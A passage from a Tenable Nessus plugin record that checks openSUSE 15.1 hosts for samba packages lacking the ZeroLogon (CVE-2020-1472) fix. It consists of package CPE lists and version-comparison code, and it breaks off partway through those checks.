"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors-devel", "p-cpe:/a:novell:opensuse:libsamba-errors0", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libsamba-policy-python-devel", "p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel", "p-cpe:/a:novell:opensuse:libsamba-policy0", "p-cpe:/a:novell:opensuse:libsamba-policy0-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb-devel", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsmbldap2", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo", "p-cpe:/a:novell:opensuse:samba-pidl", "p-cpe:/a:novell:opensuse:samba-python", "p-cpe:/a:novell:opensuse:samba-python-debuginfo", "p-cpe:/a:novell:opensuse:samba-python3", "p-cpe:/a:novell:opensuse:samba-python3-debuginfo", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:samba-ad-dc", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo", "p-cpe:/a:novell:opensuse:samba-ceph", "p-cpe:/a:novell:opensuse:samba-ceph-debuginfo", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:samba-dsdb-modules", "p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python"], "id": "OPENSUSE-2020-1513.NASL", "href": "https://www.tenable.com/plugins/nessus/140797", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1513.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140797);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-2020-1513)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with\n some non default configurations when an attacker\n established a vulnerable Netlogon secure channel\n connection to a domain controller, using the Netlogon\n Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-pcp-pmda-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-pcp-pmda-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-tests-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-tests-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-binding0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-binding0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-samr-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-samr0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-samr0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-krb5pac-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-krb5pac0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-krb5pac0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) 